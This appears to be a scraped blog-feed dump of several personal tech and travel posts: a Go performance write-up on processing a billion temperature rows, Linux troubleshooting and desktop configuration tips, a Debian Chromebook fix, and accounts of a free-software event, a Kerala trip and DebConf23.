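		done := make(chan struct{})
		go drain(ch, done)
		batch := make([]int, 0, batchSize)
		for j := 0; j \u003C items; j++ {
			batch = append(batch, j)
			if len(batch) == batchSize {
				ch \u003C- batch \u002F\u002F one channel operation per 1024 items
				batch = make([]int, 0, batchSize)
			}
		}
		if len(batch) > 0 {
			ch \u003C- batch
		}
		close(ch)
		\u003C-done
	}
}

For the same amount of data, the batched variant performs roughly
three orders of magnitude fewer channel operations.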
Each channel operation involves locking and unlocking, which can be costly, especially in a high-frequency context.
Iteration 2: Batch processing of lines#
In this version, we batch the lines before sending them to the workers, which significantly reduces the overhead of channel communication.
Batch Processing: Each batch contains batchSize lines. This reduces the frequency of channel operations (both sending and receiving), as well as the overhead associated with these operations.
Efficient Worker Utilization: With batch processing, each worker goroutine spends more time processing data and less time interacting with channels. This reduces the overhead of context switching and synchronization, making the processing more efficient.
const (
	batchSize        = 1000000 \u002F\u002F Number of lines per batch
)

\u002F\u002F ...
		scanner := bufio.NewScanner(file)
		var batch []string
		for scanner.Scan() {
			batch = append(batch, scanner.Text())
			if len(batch) >= batchSize {
				batchesChan \u003C- batch
				batch = nil \u002F\u002F Start a new batch
			}
		}
		\u002F\u002F Send any remaining lines in the last batch
		if len(batch) > 0 {
			batchesChan \u003C- batch
		}
		close(batchesChan)

\u002F\u002F ...
func worker(batchesChan \u003C-chan []string, resultsChan chan\u003C- map[string]Stats, wg *sync.WaitGroup) {
	defer wg.Done()

	stationStats := make(map[string]Stats)
	for batch := range batchesChan {
		for _, line := range batch {
			\u002F\u002F Process the line ...
		}
	}

	resultsChan \u003C- stationStats
}
\u002F\u002F ...
Results#
The improvement from iteration 1 to iteration 2 is quite remarkable, thanks to efficiently batching the lines together and reducing the number of channel ops.
go run main.go  30.02s user 0.67s system 476% cpu 6.442 total
So far, we’ve reduced the time to about 6.5s, which is a great improvement over our 19s baseline.
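As an aside that the “Potential Improvements” section at the end comes
back to: strconv.ParseFloat is itself a noticeable per-line cost. Since
every reading in the generated measurements.txt has a fixed shape (an
optional sign, one or two integer digits, and exactly one decimal
digit), a hand-rolled parser into tenths of a degree can skip float
parsing entirely. A sketch of the idea (parseTemp is a hypothetical
helper, not part of the iterations measured in this post):

package main

import \"fmt\"

\u002F\u002F parseTemp converts a reading like \"-12.3\" or \"4.5\" into tenths of
\u002F\u002F a degree (-123, 45), relying on there being exactly one digit after
\u002F\u002F the decimal point. No allocations, no floats.
func parseTemp(s string) (int64, bool) {
	if len(s) == 0 {
		return 0, false
	}
	neg := s[0] == '-'
	if neg {
		s = s[1:]
	}
	var n int64
	for i := 0; i \u003C len(s); i++ {
		c := s[i]
		if c == '.' {
			continue \u002F\u002F skip the decimal point
		}
		if c \u003C '0' || c > '9' {
			return 0, false
		}
		n = n*10 + int64(c-'0')
	}
	if neg {
		n = -n
	}
	return n, true
}

func main() {
	for _, s := range []string{\"13.3\", \"-3.7\", \"50.8\"} {
		n, ok := parseTemp(s)
		fmt.Println(s, \"->\", n, ok)
	}
}

Whether this pays off depends on profiling; none of the timings in
this post include it.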
However, we’re making quite a few extra memory allocations and the focus of next iteration should be to reduce that.\nIteration 3: Reducing memory allocations#\nA batch slice is pre-allocated with a capacity of batchSize and reused for each batch of lines.\nAfter sending a batch to the channel, the slice is reset to zero length (batch = batch[:0]), but the underlying array is retained and reused.\n\u002F\u002F Read the file and send batches of lines to the workers\n\tgo func() {\n\t\tfile, err := os.Open(measurementsFile)\n\t\tif err != nil {\n\t\t\tpanic(err)\n\t\t}\n\t\tdefer file.Close()\n\n\t\tscanner := bufio.NewScanner(file)\n\t\tbatch := make([]string, 0, batchSize) \u002F\u002F Pre-allocate with capacity\n\n\t\tfor scanner.Scan() {\n\t\t\tline := scanner.Text()\n\n\t\t\t\u002F\u002F Reuse the batch slice by appending to it until it reaches the batch size\n\t\t\tbatch = append(batch, line)\n\n\t\t\tif len(batch) >= batchSize {\n\t\t\t\tbatchesChan \u003C- batch\n\t\t\t\tbatch = batch[:0] \u002F\u002F Reset the slice without allocating new memory\n\t\t\t}\n\t\t}\n\t\t\u002F\u002F Send any remaining lines in the last batch\n\t\tif len(batch) > 0 {\n\t\t\tbatchesChan \u003C- batch\n\t\t}\n\t\tclose(batchesChan)\n\t}()\nResults#\nDown to 5.3s!\ngo run main.go  25.43s user 0.53s system 485% cpu 5.346 total\nIteration 3 (cont): Further reducing memory allocations#\nAvoiding strings.Split: Instead of using strings.Split, which allocates a new slice for each line, we can use  strings.Index to find the delimiter and manually slice the string. strings.Split typically creates a new slice for each split part, leading to more memory usage and subsequent GC overhead.\nfor batch := range batchesChan {\n\t\tfor _, line := range batch {\n\t\t\tdelimiterIndex := strings.Index(line, \";\")\n\t\t\tif delimiterIndex == -1 {\n\t\t\t\tcontinue \u002F\u002F Delimiter not found, skip this line\n\t\t\t}\n\n\t\t\tstation := line[:delimiterIndex]\n\n\t\t\ttempStr := line[delimiterIndex+1:]\n\t\t\ttemp, err := strconv.ParseFloat(tempStr, 64)\n\t\t\tif err != nil {\n\t\t\t\tcontinue \u002F\u002F Invalid temperature value, skip this line\n\t\t\t}\n\n\t\t\tstats := stationStats[station]\n\t\t\tstats.Count++\n\t\t\tstats.Min = min(stats.Min, temp)\n\t\t\tstats.Max = max(stats.Max, temp)\n\t\t\tstats.Mean += (temp - stats.Mean) \u002F float64(stats.Count)\n\t\t\tstationStats[station] = stats\n\t\t}\n\t}\nResults#\nThe time has further decreased from 5.3s to 4.8s with these changes.\ngo run main.go  15.69s user 0.44s system 332% cpu 4.853 total\nIteration 4: Read file in chunks#\nIn this version, the file is read in chunks, and each chunk is processed to ensure it contains complete lines. The processChunk function is used to separate valid data from leftover data in each chunk. Chunk size can be controlled with command line args as well.\nfunc main() {\n\t\u002F\u002F ....\n\tconst chunkSize = 256 * 1024 \u002F\u002F 256 KB\n\tbuf := make([]byte, chunkSize)\n\tleftover := make([]byte, 0, chunkSize)\n\n\tgo func() {\n\t\tfor {\n\t\t\tbytesRead, err := file.Read(buf)\n\t\t\tif bytesRead > 0 {\n\t\t\t\t\u002F\u002F Copy the chunk to a new slice, because the\n\t\t\t\t\u002F\u002F buffer will be reused in the next iteration.\n\t\t\t\tchunk := make([]byte, bytesRead)\n\t\t\t\tcopy(chunk, buf[:bytesRead])\n\t\t\t\t\u002F\u002F Process the chunk. 
The returned leftover will be processed in the next iteration.\n\t\t\t\tvalidChunk, newLeftover := processChunk(chunk, leftover)\n\t\t\t\tleftover = newLeftover\n\t\t\t\t\u002F\u002F Send the valid chunk to the processing goroutine.\n\t\t\t\tif len(validChunk) > 0 {\n\t\t\t\t\twg.Add(1)\n\t\t\t\t\tgo processChunkData(validChunk, resultsChan, &wg)\n\t\t\t\t}\n\t\t\t}\n\t\t\tif err != nil {\n\t\t\t\tbreak\n\t\t\t}\n\t\t}\n\t\twg.Wait()\n\t\tclose(resultsChan)\n\t}()\n\t\u002F\u002F ...\n}\n\n\nfunc processChunk(chunk, leftover []byte) (validChunk, newLeftover []byte) {\n\tfirstNewline := -1\n\tlastNewline := -1\n\t\u002F\u002F Find the first and last newline in the chunk.\n\tfor i, b := range chunk {\n\t\tif b == '\\n' {\n\t\t\tif firstNewline == -1 {\n\t\t\t\tfirstNewline = i\n\t\t\t}\n\t\t\tlastNewline = i\n\t\t}\n\t}\n\tif firstNewline != -1 {\n\t\tvalidChunk = append(leftover, chunk[:lastNewline+1]...)\n\t\tnewLeftover = make([]byte, len(chunk[lastNewline+1:]))\n\t\tcopy(newLeftover, chunk[lastNewline+1:])\n\t} else {\n\t\tnewLeftover = append(leftover, chunk...)\n\t}\n\treturn validChunk, newLeftover\n}\n\nfunc processChunkData(chunk []byte, resultsChan chan\u003C- map[string]Stats, wg *sync.WaitGroup) {\n\tdefer wg.Done()\n\n\tstationStats := make(map[string]Stats)\n\tscanner := bufio.NewScanner(strings.NewReader(string(chunk)))\n\n\tfor scanner.Scan() {\n\t\tline := scanner.Text()\n\n\t\t\u002F\u002F Find the index of the delimiter\n\t\tdelimiterIndex := strings.Index(line, \";\")\n\t\tif delimiterIndex == -1 {\n\t\t\tcontinue \u002F\u002F Delimiter not found, skip this line\n\t\t}\n\n\t\t\u002F\u002F Extract the station name and temperature string\n\t\tstation := line[:delimiterIndex]\n\t\ttempStr := line[delimiterIndex+1:]\n\n\t\t\u002F\u002F Convert the temperature string to a float\n\t\ttemp, err := strconv.ParseFloat(tempStr, 64)\n\t\tif err != nil {\n\t\t\tcontinue \u002F\u002F Invalid temperature value, skip this line\n\t\t}\n\n\t\t\u002F\u002F Update the statistics for the station\n\t\tstats, exists := stationStats[station]\n\t\tif !exists {\n\t\t\tstats = Stats{Min: temp, Max: temp}\n\t\t}\n\t\tstats.Count++\n\t\tstats.Min = min(stats.Min, temp)\n\t\tstats.Max = max(stats.Max, temp)\n\t\tstats.Mean += (temp - stats.Mean) \u002F float64(stats.Count)\n\t\tstationStats[station] = stats\n\t}\n\n\t\u002F\u002F Send the computed stats to resultsChan\n\tresultsChan \u003C- stationStats\n}\nIn addition to this, I moved the aggregateStats to a separate Goroutine as well:\n\taggWg.Add(1)\n\tfinalResults := make(map[string]Stats)\n\n\t\u002F\u002F Start a separate goroutine for aggregation\n\tgo func() {\n\t\tdefer aggWg.Done()\n\t\tfor workerResult := range resultsChan {\n\t\t\tfor station, stats := range workerResult {\n\t\t\t\tfinalStats, exists := finalResults[station]\n\t\t\t\tif !exists {\n\t\t\t\t\tfinalResults[station] = stats\n\t\t\t\t\tcontinue\n\t\t\t\t}\n\t\t\t\tfinalStats.Min = min(finalStats.Min, stats.Min)\n\t\t\t\tfinalStats.Max = max(finalStats.Max, stats.Max)\n\t\t\t\ttotalCount := finalStats.Count + stats.Count\n\t\t\t\tfinalStats.Mean = (finalStats.Mean*float64(finalStats.Count) + stats.Mean*float64(stats.Count)) \u002F float64(totalCount)\n\t\t\t\tfinalStats.Count = totalCount\n\t\t\t\tfinalResults[station] = finalStats\n\t\t\t}\n\t\t}\n\t}()\nResults#\nWe’re down from 4.8s to just 2.1s to read\u002Fparse\u002Fprocess 100mn lines!\n.\u002Fbin\u002F1brc.bin --file=input.txt --chunksize=1048576  17.58s user 0.77s system 837% cpu 2.190 total\nSummary#\nBasic File 
Reading and Parsing (Baseline):
Time: 19s (baseline).
Key Change: Sequentially reading and processing each line.
Speedup: N\u002FA (baseline).
Producer-Consumer Pattern:
Time: 54.225s.
Key Change: Implemented concurrent line processing with producer-consumer pattern.
Speedup: -185% (slower than baseline).
Batch Processing of Lines:
Time: 6.442s.
Key Change: Batched lines before processing, reducing channel communication.
Speedup: +66% (compared to baseline).
Reducing Memory Allocations - Iteration 1:
Time: 5.346s.
Key Change: Reused batch slices and reduced memory allocations.
Speedup: +72% (compared to baseline).
Reducing Memory Allocations - Iteration 2 (Avoiding strings.Split):
Time: 4.853s.
Key Change: Replaced strings.Split with manual slicing for efficiency.
Speedup: +75% (compared to baseline).
Read File in Chunks:
Time: 2.190s.
Key Change: Processed file in chunks and optimized aggregation.
Speedup: +87% (compared to baseline).
Final Run#
I’m quite satisfied with the final version for now. We can now proceed to test it with 1 billion lines. However, it’s evidently CPU-bound, as we spawn N workers for N CPUs.
I experimented with different chunk sizes, and here are the results from each run:

Chunk Size    Time
512.00 KB     23.756s
1.00 MB       21.798s
16.00 MB      20.693s
32.00 MB      19.501s

Tweaking the chunk size has only a modest impact: going from 512 KB to 32 MB shaves off roughly 4 seconds, with diminishing returns as the chunks get larger.
TL;DR: On average, across multiple runs, the final iteration takes approximately 20s for 1bn lines.
Check out the full code on my GitHub.
Potential Improvements#
This project was not only fun but also a great opportunity to revisit and refine many Go concepts. There are several ideas to contemplate for further improving this version’s timings:
I haven’t yet considered using mmap, but I believe it could substantially speed things up.
To delve even deeper, custom line parsing functions, especially for converting string to float64, could offer improvements.
Employing custom hashing functions (perhaps FNV) might aid in faster map lookups.
Fin!",[],{"slug":1080,"title":1081,"link":1082,"pubDate":1083,"contentSnippet":1084,"tags":1085,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"sad-servers","Making sad servers happy","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fsad-servers\u002F","2023-11-06T00:00:00.000Z","Introduction to SadServers#
Recently, I stumbled upon sadservers, a platform described as “Like LeetCode for Linux”. The premise is: you are given access to a full remote Linux server with a pre-configured problem. Your mission is to diagnose and fix the issues in a fixed time window.
With the goal of documenting my journey through these challenges and sharing the knowledge gained, I decided to not only tackle these puzzles but also to record my solutions in a video format. The format is twofold in its purpose: it allows me to reflect on my problem-solving approach and provides a resource for others who may encounter similar problems, whether in real-world scenarios or in preparation for an SRE\u002FDevOps interview.
The Learning Curve#
Each server presented a different issue, from misconfigured network settings to services failing to start, from permission issues to resource overutilization. One server, for instance, had a failing database service because of a full disk partition. The cause? Stale backup files.
Another had a web server throwing errors because of incorrect file permissions.\nRecording the Solutions#\nThe video recordings start with an introduction to the problem and my initial thoughts. Viewers can see my screen as I work through the issue, making the troubleshooting process transparent and educational. The commentary explains my thought process, the tools\u002FCLI utilities used, and the solutions applied.\nPart 1#\n\nPart 2#\n\nPart 3#\n\nConclusion#\nFor those looking to enhance their Linux troubleshooting skills, sadservers.com is a gold mine. It’s an excellent preparation ground for anyone aiming to step into the SRE\u002FDevOps field or wanting to keep their skills sharp.\nAs I continue to record and share these troubleshooting escapades, I invite you to subscribe, comment with your insights, or even suggest what types of challenges you’d like to see addressed next.",[],{"slug":1087,"title":1088,"link":1089,"pubDate":1090,"contentSnippet":1091,"tags":1092,"maintainerName":27,"maintainerUsername":28,"maintainerPhoto":29,"feedUrl":30},"05-rupee-sign-on-hyprland-html","Enabling AltGr+4 for rupee\u002Feuro on Hyprland","https:\u002F\u002Faryak.me\u002Fblog\u002F05-rupee-sign-on-hyprland.html","Fri, 03 Nov 2023 12:39:45 +0000","Enabling the rupee sign (or the euro sign for that matter) on\nHyprland is pretty simple, but not well documented from my\n“research”.\nTo begin with, you need to use the altgr-intl layout in order to be\nable to use it in the first place. This also gives you access to many\nother characters as well.\nTo do this, add kb_variant = altgr-intl in the input\nsection of your hyprland.conf.\nPast this, the configuration is pretty simple, you just have to add\nthe required options to kb_options.\nYou can get a list of these with\nlocalectl list-x11-keymap-options.\nIn my case, I needed rupeesign:4\nAt the end, this is how the hyprland.conf’s input section looks:\ninput {\n    kb_layout = us\n    kb_options = rupeesign:4, caps:backspace\n    kb_variant = altgr-intl\n    [...mouse stuff...]\n}",[1093],"2023\u002F11\u002F03\u002F5",{"slug":1095,"title":1096,"link":1097,"pubDate":1098,"contentSnippet":1099,"tags":1100,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"software-freedom-day-at-sflc-in","Software Freedom Day at sflc.in","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fsoftware-freedom-day-at-sflc.in\u002F","Mon, 23 Oct 2023 03:25:34 +0530","Software Freedom Law Center, India, also known as sflc.in, organized an event to celebrate the Software Freedom Day on 30th September 2023. I, Sahil, Contrapunctus and Suresh joined. The venue was at the SFLC India office in Delhi. The sflc.in office was on the second floor of what looked like someone’s apartment:). I also met Chirag, Orendra, Surbhi and others.\nMy plan was to have a stall on LibreOffice and Prav app to raise awareness about these projects. I didn’t have QR code for downloading prav app printed already, so I asked the people at sflc.in if they can get it printed for me. They were very kind and helped me in getting a color printout for me. So, I got a stall in their main room. Surbhi was having an Inkscape stall next to mine and gave me company.  People came and asked about the prav project and then I realized I was still too tired to explain the idea behind the prav project and about LibreOffice (after a long Kerala trip). We got a few prav app installs during the event, which is cool.\n\n      \nMy stall. 
Photo credits: Tejaswini.\nSahil had a Debian stall, and contrapunctus had an OpenStreetMap stall. After about an hour, Revolution OS was screened for all of us to watch, along with popcorn. The documentary gave an overview of history of Free Software Movement. The office had a kitchen where fresh chai was being made and served to us. The organizers ordered a lot of good snacks for us.\n\n      \nSnacks and tea at the front desk. CC-BY-SA 4.0 by Ravi Dwivedi.\nI came out of the movie hall to take more tea and snacks from the front desk. I saw a beautiful painting was hanging at the wall opposite to the front desk and Tejaswini (from sflc.in) revealed that she had made it. The tea was really good as it was freshly made in the kitchen.\nAfter the movie, we played a game of pictionary. We were divided into two teams. The game goes as follows: A person from a team is selected and given a term related to freedom respecting software written on a piece of paper, but concealed from other participants. Then that person draws something on the board (no logo, no alphabets) without speaking. If the person’s team correctly guesses the term, the team gets one step ahead on the leaderboard. The team that reaches the finish line wins.\nI recall some fun Pictionary rounds. For example, the one in the picture below seemed far from the word “Wireguard,” but someone from the team still guessed that word. Our team won in the end \\o\u002F.\n\n      \nPictionary drawing nowhere close to the intended word Wireguard :), which was guessed. Photo by Ravi Dwivedi, CC-BY-SA 4.0.\nThen, we posed for a group picture. At the end, SFLC.in had a delicious cake in store for us. They also had some merchandise available, such as handbags, T-shirts, etc., which we could take if we made a donation to SFLC.in. I “bought” a handbag with “Ban Plastic, not Internet” written on it in exchange for a donation. I hope that gives people around me a powerful message :)\n\n      \nGroup photo. Photo credits: Tejaswini.\n\n      \nTasty cake. CC-BY-SA 4.0 by Ravi Dwivedi.\n\n      \nMerchandise by sflc.in. CC-BY-SA 4.0 by Ravi Dwivedi.\nOverall, sflc.in hosted a fantastic event!",[],{"slug":1102,"title":1103,"link":1104,"pubDate":1105,"contentSnippet":1106,"tags":1107,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-14","Riff: A \"mycelium-clj\" for the Clojure ecosystem?","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Fmycelium-clj\u002Findex.html","Thu, 19 Oct 2023 00:00:00 +0000","In a world of concrete objects, steel frameworks bring sense and order. In a forest of composable tools, libraries and open-ended schemas, it would be the mycelia. A frustrated yet optimistic man muses \"Might such a thing come to be?\".",[49,52,723,530,1108],"recurse_center",{"slug":1110,"title":1111,"link":1112,"pubDate":1113,"contentSnippet":1114,"tags":1115,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"kochi-wayanad-trip-aug-sep-2023","Kochi - Wayanad Trip in August-September 2023","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fkochi-wayanad-trip-aug-sep-2023\u002F","Sat, 14 Oct 2023 17:48:54 +0530","A trip full of hitchhiking, beautiful places and welcoming locals.\nDay 1: Arrival in Kochi\nKochi is a city in the state of Kerala, India. This year’s DebConf was to be held in Kochi from 3rd September to 17th of September, which I was planning to attend. 
My friend Suresh, who was planning to join, told me that 29th August 2023 will be Onam, a major festival of the state of Kerala. So, we planned a Kerala trip before the DebConf. We booked early morning flights for Kochi from Delhi and reached Kochi on 28th August.\nWe had booked a hostel named Zostel in Ernakulam. During check-in, they asked me to fill a form which required signing in using a Google account. I told them I don’t have a Google account and I don’t want to create one either. The people at the front desk seemed receptive, so I went ahead with telling them the problems of such a sign-in being mandatory for check-in. Anyways, they only took a photo of my passport and let me check-in without a Google account.\nWe stayed in a ten room dormitory, which allowed travellers of any gender. The dormitory room was air-conditioned, spacious, clean and beds were also comfortable. There were two bathrooms in the dormitory and they were clean. Plus, there was a separate dormitory room in the hostel exclusive for females. I noticed that that Zostel was not added in the OpenStreetMap and so, I added it :) . The hostel had a small canteen for tea and snacks, a common sitting area outside the dormitories, which had beds too. There was a separate silent room, suitable for people who want to work.\n\n      \nDormitory room in Zostel Ernakulam, Kochi.\n\n      \nBeds in Zostel Ernakulam, Kochi.\nWe had lunch at a nearby restaurant and it was hard to find anything vegetarian for me. I bought some freshly made banana chips from the street and they were tasty. As far as I remember, I had a big glass of pineapple juice for lunch. Then I went to the Broadway market and bought some cardamom and cinnamon for home. I also went to a nearby supermarket and bought Matta brown rice for home. Then, I looked for a courier shop to send the things home but all of them were closed due to Onam festival. After returning to the Zostel, I overslept till 9 PM and in the meanwhile, Suresh planned with Saidut and Shwetank (who met us during our stay in Zostel) to go to a place in Fort Kochi for dinner. I suspected I will be disappointed by lack of vegetarian options as they were planning to have fish. I already had a restaurant in mind - Brindhavan restaurant (suggested by Anupa), which was a pure vegetarian restaurant.\nTo reach there, I got off at Palarivattom metro station and started looking for an auto-rickshaw to get to the restaurant. I didn’t get any for more than 5 minutes. Since that restaurant was not added to the OpenStreetMap, I didn’t even know how far that was and which direction to go to. Then, I saw a Zomato delivery person on a motorcycle and asked him where the restaurant was. It was already 10 PM and the restaurant closes at 10:30. So, I asked him whether he can drop me off. He agreed and dropped me off at that restaurant. It was 4-5 km from that metro station. I tipped him and expressed my gratefulness for the help. He refused to take the tip, but I insisted and he accepted.\nI entered the restaurant and it was coming to a close, so many items were not available. I ordered some Kadhai Paneer (only item left) with naan. It tasted fine. Since the next day was Thiruvonam, I asked the restaurant about the Sadya thali menu and prices for the next day. I planned to eat Sadya thali at that restaurant, but my plans got changed later.\n\n      \nOnam sadya menu from Brindhavan restaurant.\nDay 2: Onam celebrations\nNext day, on 29th of August 2023, we had plan to leave for Wayanad. 
Wayanad is a hill station in Kerala and a famous tourist spot. Praveen suggested to visit Munnar as it is far closer to Kochi than Wayanad (80 km vs 250 km). But I had already visited Munnar in my previous trips, so we chose Wayanad. We had a train late night from Ernakulam Junction (at 23:30 hours) to Kozhikode, which is the nearest railway station from Wayanad. So, we checked out in the morning as we had plans to roam around in Kochi before taking the train.\nZostel was celebrating Onam on that day. To opt-in, we had to pay 400 rupees, which included a Sadya Thali and a Mundu. Me and Suresh paid the amount and opted in for the celebrations. Sadya thali had Rice, Sambhar, Rasam, Avial, Banana Chips, Pineapple Pachadi, Pappadam, many types of pickels and chutneys, Pal Ada Payasam and Coconut jaggery Pasam. And, there was water too :). Those payasams were really great and I had one more round of them. Later, I had a lot of variety of payasams during the DebConf.\n\n      \nSadya lined up for serving\n\n      \nSadya thali served on banana leaf.\nIn the evening, we hung out in the common room and put our luggage there. We played UNO and had conversations with other travellers in the hostel. I had a fun time there and I still think it is one of the best hostel experiences I had. We made good friends with Saiduth (Telangana) and Shwetank (Uttarakhand). They were already aware about the software like debian, and we had some detailed conversations about the Free Software movement. I remember explaining the difference between the terms “Open Source” and “Free Software”. I also told them about the Streetcomplete app, a beginner friendly app to edit OpenStreetMap. We had dinner at a place nearby (named Palaraam), but again, the vegetarian options were very limited! After dinner, we came back to the Zostel and me and Suresh left for Ernakulam Junction to catch our train Maveli Express (16604).\nDay 3: Going to Wayanad\nMaveli Express was scheduled to reach Kozhikode at 03:25 (morning). I had set alarms from 03:00 to 03:30, with the gap of 10 minutes. Every time I woke up, I turned off the alarm. Then I woke up and saw train reaching the Kozhikode station and woke up Suresh for deboarding. But then I noticed that the train is actually leaving the station, not arriving! This means we missed our stop. Now we looked at the next stops and whether we can deboard there. I was very sleepy and wanted to take a retiring room at some station before continuing our journey to Wayanad. The next stop was Quilandi and we checked online that it didn’t have a retiring room. So, we skipped this stop. We got off at the next stop named Vadakara and found out no retiring room was available. So, we asked about information regarding bus for Wayanad and they said that there is a bus to Wayanad around 07:00 hours from bus station which was a few kilometres from the railway station.\nWe took a bus for Kalpetta (in Wayanad) at around 07:00. The destination of the buses were written in Malayalam, which we could not read. Once again, the locals helped us to get on to the bus to Kalpetta. Vadakara is not a big city and it can be hard to find people who know good Hindi or English, unlike Kochi. Despite language issues, I had no problem there in navigation, thanks to locals. I mostly spent time sleeping during the bus journey.\nA few hours later, the bus dropped us at Kalpetta. We had a booking at a hostel in Rippon village. It was 16 km from Kalpetta. 
On the way, we were treated with beautiful views of nature, which was present everywhere in Wayanad. The place was covered with tea gardens and our eyes were treated with beautiful scenery at every corner.\n\n      \nWe were treated with such views during the Wayanad trip.\nRippon village was a very quiet place and I liked the calm atmosphere. This place is blessed by nature and has stunning scenery. I found English was more common than Hindi in Wayanad. Locals were very nice and helpful, even if they didn’t know my language.\n\n      \nA road in Rippon.\nAfter catching some sleep at the hostel, I went out in the afternoon. I hitchhiked to reach the main road from the hostel. I bought more spices from a nearby shop and realized that I should have waited for my visit to Wayanad to buy cardamom, which I already bought from Kochi. Then, I was looking for post office to send spices home. The people at the spices shop told me that the nearby Rippon post office was closed by that time, but the post office at Meppadi was open, which was 5 km from there.\nI went to Meppadi and saw the post office closes at 15:00, but I reached five minutes late. My packing was not very good and they asked me to pack it tighter. There was a shop near the post office and the people there gave me a cardboard and tapes, and helped pack my stuff for the post. By the time I went to the post office again, it was 15:30. But they accepted my parcel for post.\nDay 4: Kanthanpara Falls, Zostel Wayanad and Karapuzha Dam\nKanthanpara waterfalls were 2 km from the hostel. I hitchhiked to the place from the hostel on a scooty. Entry ticket was worth Rs 40. There were good views inside and nothing much to see except the waterfalls.\n\n      \nEntry to Kanthanpara Falls.\n\n      \nKanthanpara Falls.\nWe had a booking at Zostel Wayanad for this day and so we shifted there. Again, as with their Ernakulam branch, they asked me to fill a form which required signing in using Google, but when I said I don’t have a Google account they checked me in without that. There were tea gardens inside the Zostel boundaries and the property was beautiful.\n\n      \nA view of Zostel Wayanad.\n\n      \nA map of Wayanad showing tourist places.\n\n      \nA view from inside the Zostel Wayanad property.\nLater in the evening, I went to Karapuzha Dam. I witnessed a beautiful sunset during the journey. Karapuzha dam had many activites, like ziplining, and was nice to roam around.\nChembra Peak is near to the Zostel Wayanad. So, I was planning to trek to the heart shaped lake. It was suggested by Praveen and looking online, this trek seemed worth doing. There was an issue however. The charges for trek were Rs 1770 for upto five people. So, if I go alone I will have to spend Rs 1770 for the trek. If I go with another person, we split Rs 1770 into two, and so on. The optimal way to do it is to go in a group of five (you included :D). I asked front desk at Zostel if they can connect me with people going to Chembra peak the next day, and they told me about a group of four people planning to go to Chembra peak the next day. I got lucky! All four of them were from Kerala and worked in Qatar.\nDay 5: Chembra peak trek\nThe date was 1st September 2023. I woke up early (05:30 in the morning) for the Chembra peak trek. I had bought hiking shoes especially for trekking, which turned out to be a very good idea. The ticket counter opens at 07:00. The group of four with which I planned to trek met me around 06:00 in the Zostel. 
We went to the ticket counter around 06:30. We had breakfast at shops selling Maggi noodles and bread omelette near the ticket counter.
The day was scorching hot, and the trek proved to be challenging for someone like me, who was relatively inexperienced. However, the lush green scenery surrounding us was incredibly beautiful throughout the journey.

      
Terrain during trekking towards the Chembra peak.

      
Heart-shaped lake at the Chembra peak.

      
Me at the heart-shaped lake.

      
Views from the top of the Chembra peak.

      
View of another peak from the heart-shaped lake.
On the way back from the trek, I stumbled upon a shop selling bamboo rice, which I purchased with the intention of making bamboo rice payasam at home (I even have some coconut milk from Kerala to use ;)). We arrived back at Zostel in the afternoon. I experienced muscle soreness after the trek, and it has yet to completely subside. Later that night, we boarded a bus from Kalpetta to Kozhikode to begin our journey back to Kochi.
Day 6: Return to Kochi
At midnight on the 2nd of September, we arrived at Kozhikode bus stand. Afterward, we wandered around in search of something to eat, but unfortunately, I couldn’t find any vegetarian options. Not a surprising turn of events, considering Kozhikode is especially famous for its non-vegetarian dishes. We then headed to Kozhikode railway station to inquire about retiring rooms, but we were out of luck. We waited at the station and caught the next train to Kochi at 03:30, arriving at Ernakulam Junction at 07:30, half an hour before the scheduled arrival time of the train. From there, we made our way to Zostel Fort Kochi, where we spent the night before checking out the next morning.
Day 7: Roaming around in Fort Kochi
On the 3rd of September, we explored Fort Kochi, visiting popular landmarks such as St. Francis Church, Dutch Palace, Jew Town, and the Pardesi Synagogue. During our visit, I also had the opportunity to tour some homestays, where the owners graciously showed me around their properties, despite my clear indication that I was not seeking accommodation. In the evening, we made our way to Kakkanad to participate in DebConf.
For more details on my experiences at DebConf23, you can continue reading in my DebConf23 blog post.",[],{"slug":1117,"title":1118,"link":1119,"pubDate":1120,"contentSnippet":1121,"tags":1122,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"fixing-audio-and-keymap-in-chromebook-running-debian","Fixing audio and keymaps in Chromebook Running Debian Bookworm","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Ffixing-audio-and-keymap-in-chromebook-running-debian\u002F","Tue, 26 Sep 2023 13:07:22 +0530","I recently bought an HP Chromebook from Abhas who had already flashed coreboot in it.
I ran a fresh installation of Debian 12 (Bookworm) on it with KDE Plasma.\nRight after installation, the Wi-Fi and bluetooth were working, but I was facing two issues:\nPlaying a music file or any audio file does not give any audio.\nKeyboard buttons like the ones for brightness and audio adjustment were not working (alphabet keys were working).\nFixing audio\nI ran the script mentioned here and that fixed the audio.\nThe instructions from that link are:\ngit clone https:\u002F\u002Fgithub.com\u002FWeirdTreeThing\u002Fchromebook-linux-audio\ncd chromebook-linux-audio\n.\u002Fsetup-audio\n\nFixing keyboard\nTo fix the keyboard, go to KDE Settings and in the Hardware section, under the “Keyboard model” box select the option Google | Chromebook as depicted in the screenshot below.\n\n      \nScreenshot depicting keyboard layout settings of KDE.\nI hope this post fixed the issues for you. Meet you in the next post.",[],{"slug":1124,"title":1125,"link":1126,"pubDate":1127,"contentSnippet":1128,"tags":1129,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"debconf23","Debconf23","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fdebconf23\u002F","Fri, 22 Sep 2023 23:49:38 +0530","Official logo of DebConf23\nIntroduction\nDebConf23, the 24th annual Debian Conference, was held in India in the city of Kochi, Kerala from the 3rd to the 17th of September, 2023. Ever since I got to know about it (which was more than an year ago), I was excited to attend DebConf in my home country. This was my second DebConf, as I attended one last year in Kosovo. I was very happy that I didn’t need to apply for a visa to attend. I got full bursary to attend the event (thanks a lot to Debian for that!) which is always helpful in covering the expenses, especially if the venue is a five star hotel :)\nFor the conference, I submitted two talks. One was suggested by Sahil on Debian packaging for beginners, while the other was suggested by Praveen who opined that a talk covering broader topics about “freedom” in self-hosting services will be better, when I started discussing about submitting a talk about prav app project. So I submitted one on Debian packaging for beginners and the other on ideas on 